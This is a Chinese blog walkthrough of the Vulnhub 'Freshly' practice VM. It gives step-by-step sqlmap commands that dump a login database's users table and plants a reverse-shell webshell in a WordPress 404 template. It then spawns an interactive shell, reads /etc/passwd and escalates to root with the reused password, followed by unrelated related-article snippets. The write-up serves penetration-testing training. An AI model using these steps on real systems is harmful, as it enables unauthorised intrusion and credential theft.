Vulnhub靶机第六关

最新推荐文章于 2025-04-12 13:55:43 发布
最新推荐文章于 2025-04-12 13:55:43 发布
阅读量1.1k 收藏 9
点赞数 5
分类专栏: Vulnhub靶机第六关 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/L1928/article/details/108318694
版权

Vulnhub靶机 freshly
运行环境
Virtualbox
VM(运行会提示错误,给的解决链接已经404)
本靶机推荐使用Virtualbox搭建
说明
此靶机的目标是通过网络渗透进主机,并找到隐藏在敏感文件中的秘密。
运行环境
将下载的OVA文件导入进Virtualbox即可。
将虚拟机用virtualbox打开后设置为桥接网卡
在这里插入图片描述
查看本机网卡找到对应的ip段使用nmap 扫描
命令:ipconfig /all|more
Nmap -sT 192.168.1.0/24
在这里插入图片描述
切换网络时ip会改变
访问主页
在这里插入图片描述
使用御剑扫描目录
在这里插入图片描述
发现登录页
在这里插入图片描述
使用sqlmap扫描
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 查看是否存在注入点
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 --dbs 查看数据库
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” --tables 查看数据表
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” -T “users” --columns 查看字段
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” -T “users” -C “username,password” --dump 查看字段内容
得到账户密码:admin SuperSecretPassword
在这里插入图片描述
登录后台
http://192.168.1.54:8080/wordpress/wp-login.php
在404模板写入反弹shell 的大马
在这里插入图片描述
开启nc监听
在这里插入图片描述
访问404.php
在这里插入图片描述
拿到shell
在这里插入图片描述
输入:python -c 'import pty;pty.spawn("/bin/bash")'得到一个交互式的shell
在这里插入图片描述
输入 cat /etc/passwd
在这里插入图片描述
输入su 尝试切换到root用户,尝试输入注入得到的密码:SuperSecretPassword 成功切换
在这里插入图片描述
但是根目录下都是乱码
输入: ls -lh --color=never 乱码恢复正常
在这里插入图片描述
提权成功

65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
针对靶机ip找不到问题
-----------------------------------------------------------------------------------------
11-27 511
Vulnhub一些靶机是对应 Virtual Box 的。使用Vmware的话有时候会出现扫描不到靶机ip的情况。在靶机描述里有:VirtualBox 是应对这一挑战的推荐平台。还有解决不了的可以尝试使用VirtualBox打开。有时只是networking没有开启。
Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 5371
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
Vulnhub 靶机ip无法扫描到的解决方法
weixin_63231007的博客
07-12 1756
Vulnhub一些靶机是对应 Virtual Box 的。使用Vmware的话有时候会出现扫描不到靶机ip的情况。在靶机描述里有:VirtualBox 是应对这一挑战的推荐平台。解决方法呢就是。1. 首先重启靶机,在重启界面点击键盘e,找到内核加载配置行,将其修改为单用户启动模式: 2. 将 ro 改为 rw single init=/bin/bash3. Ctrl+x进入单用户模式(root),输入 ip a 命令查看网卡设备名称:是ens334. 查看网络配置文件/etc/network/interf
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7761
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
带妹玩转Vulnhub【三】
BadRer的博客
09-30 1046
前言 今天妹子终于主动来找我说话了!哈哈哈哈
信息安全_.第六期.CTF.Web之Vulnhub靶场.课件资料.pptx
08-14
Vulnhub上,你可以找到多种类型的靶机,每个靶机都设计了特定的破解目标,模拟真实世界的攻击场景,有助于安全从业者和爱好者提升漏洞发现、利用和防御能力。 CTF(Capture The Flag)竞赛是一种流行的信息安全...
VulnHub
02-10
6. 1个: 这可能是指2021年的第一个项目,或者表示有至少一个相的文件或资源。 7. 2021年: 再次强调这些资源的发布时间。 8. 01: 同样,这可能是表示一月份的发布。 在"VulnHub-main"这个压缩包文件中,很可能是...
Vulnhub靶机实战-Billu_b0x
黑白的博客
01-10 543
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.14 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22 访问80 http://192.168.239.14 熟悉的四个字母SQLi 试了一堆,试了个寂寞 vulnhub惯例
Vulnhub靶机实战-Lazysysadmin
黑白的博客
01-10 392
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.239.15 -p 1-65535 -oN nmap.A 有意思,开启端口不少 发现开启80,22,139,445,3306,6667 访问80 http://192.168.239.15 扫描目录 python3 dirsearch.py -u http:
Vulnhub靶机 TOPHATSEC: FRESHLY writeup
xingjinhao123的博客
02-27 468
Vulnhub靶机 TOPHATSEC: FRESHLY writeup
No.43-VulnHub-TopHatSec: Freshly-Walkthrough渗透学习
qq_34801745的博客
02-04 783
** VulnHub-TopHatSec: Freshly-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/tophatsec-freshly,118/ 靶机难度:初级(CTF) 靶机发布日期:2015年2月18日 靶机描述: 这项挑战的目标是通过网络闯入机器并找到隐藏在敏感文件中的秘密。如果可以找到秘密,请给我发送电子邮件进行验证。???? 您可以使...
豪越赋能消防安全管控,解锁一体化内管“安全密码”
最新发布
HYDO2019的博客
04-12 423
豪越科技依托强大的技术研发实力与对消防行业的深刻理解,推出了消防一体化安全管控平台,为消防内部管理带来了全新的变革。数据整合,智能调配装备物资。
网站DDoS防护方案——构建企业级安全屏障的键路径
2501_91486804的博客
04-11 572
IDC报告显示,采用智能弹性防护方案的企业,业务中断时间中位数仅为11分钟,相较传统方案缩短89%。本文深度解析DDoS攻击最新演变趋势与防御技术体系,通过攻击特征图谱、云原生防护架构、混合防御模型等维度,揭示企业级网站防护方案的设计逻辑。网站DDoS防护方案需集成BGP FlowSpec协议,实现攻击特征在骨干网的分钟级同步,将清洗动作从应用层下沉至网络层。某股份制银行在等保测评中,因其防护方案具备完整的流量镜像与证据链固化功能,成为全国首个通过四级认证的金融网站。
视频智能分析平台EasyCVR打造智能视频监控烟火预警系统,助力烟花鞭炮厂坚固安全防线
NVR安防视频技术
04-11 389
为有效预防和减少事故的发生,应急管理部要求,全国烟花爆竹生产企业需在规定时间内,完成报警与监控联网,排查安全隐患,保障国家和人民财产的安全
2025年港口危货储存单位主要安全管理人员备考练习题
2301_79298466的博客
04-09 248
4、安全生产事故响应分级主要针对事故危害程度、影响范围和单位控制事态的能力,将事故分为不同的等级。2、运输民用爆炸物品车辆未按照规定悬挂或者安装符合国家标准的易燃易爆危险物品警示标志的,由公安机责令改正,处( )的罚款2。3、港口危险货物储存作业单位主要安全管理人员安全生产知识和管理能力考核总分 100 分,合格分数为( )。1、依据《安全生产法》,危险物品的生产、储存单位的安全生产管理人员的任免,应当告知( )。A. 主管的负有安全生产监督管理职责的部门。D. 5 万元以上 20 万元以下。
餐饮厨房开源监控安全系统的智能革命
Q12345bb的博客
04-10 423
如何让后厨更透明、更安全、更可信?- 行为识别:基于深度学习(ResNet+姿态分析),捕捉吸烟、离岗、未按流程操作等违规行为,误报率低于2%。- 内置反馈通道,用户可通过APP提交建议(如“后厨油烟过重”),AI分类后推送至管理者。,打造智能化、全方位的安全防护网,助力餐饮行业破解管理痛点,提升消费者信心,开启智慧后厨新篇章!- 检测食品安全风险,如生熟分离不规范、添加剂滥用,识别率达97%,响应时间低于1秒。- 效果:某连锁餐厅试点,日均发现10余次卫生隐患,整改率提升90%。
包含网络、平台、数据及安全四大体系的智慧快消开源了
weixin_63598920的博客
04-10 468
智慧快消视频监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。国产化人工智能“产学 研用”一体化创新模式 在行业的建立,将大大提升当地政府人工智能形象。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。
WHAT - React 安全地订阅外部状态源 - useSyncExternalStore
weixin_58540586的博客
04-09 752
方案是否支持并发模式会不会 stale / tearing❌ 不可靠⚠️ 有风险✅ 支持✅ 不会撕裂如果你在写一个“订阅型”的 hook,比如监听媒体查询WebSocketReduxZustandwindow 变化等——就推荐用。用途用法本地 React 状态管理useStateuseReducer全局状态库(Redux 等)推荐使用原生订阅类对象(如 window、WebSocket)兼容 SSR支持如果你用的是 Redux 4.2+,它的就内部用的。
vulnhub靶机第一
02-13
针对 VulnHub 平台上首个挑战的信息或攻略,虽然提供的参考资料并未直接涉及此主题[^1][^2][^3],仍可以根据专业知识提供指导。 对于 VulnHub 上的第一个挑战,通常这类虚拟机镜像设计用于让网络安全爱好者练习渗透测试技能。首往往作为入门级难度设置,旨在帮助新手熟悉基本漏洞利用技巧以及Linux/Windows系统的安全弱点。 具体到第一个挑战 Walkthrough 的一般流程如下: ### 定位目标机器并枚举服务 通过网络扫描工具如 Nmap 来发现在线的服务端口及其版本信息: ```bash nmap -A <target_IP> ``` ### Web 应用程序侦察 如果存在 HTTP 或 HTTPS 服务,则应进一步调查网页内容是否存在已知的安全缺陷或者配置错误。可以借助 Burp Suite 这样的代理服务器来拦截请求响应数据包以便分析潜在可攻击面。 ### 利用找到的漏洞获取初始访问权限 依据前面收集的情报尝试匹配 CVE 数据库中的条目或者其他公开资源里描述过的相似案例;有时官方文档也会给出提示性的线索指向特定类型的脆弱点。例如 SQL 注入、命令执行等高危操作失误都可能是突破防线的键所在。 ### 提权至管理员级别账户控制整个系统 一旦成功登陆远程 shell 后,下一步就是寻找本地提权的机会——这可能涉及到内核模块加载机制滥用、定时任务脚本注入风险或者是未修复的应用层 bug 导致的越界读写行为等等复杂情况。 完成上述过程后即宣告通胜利,在实际演练过程中建议记录下每一步骤的具体细节形成完整的 Writeup 文档分享给社区其他成员学习交流之用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值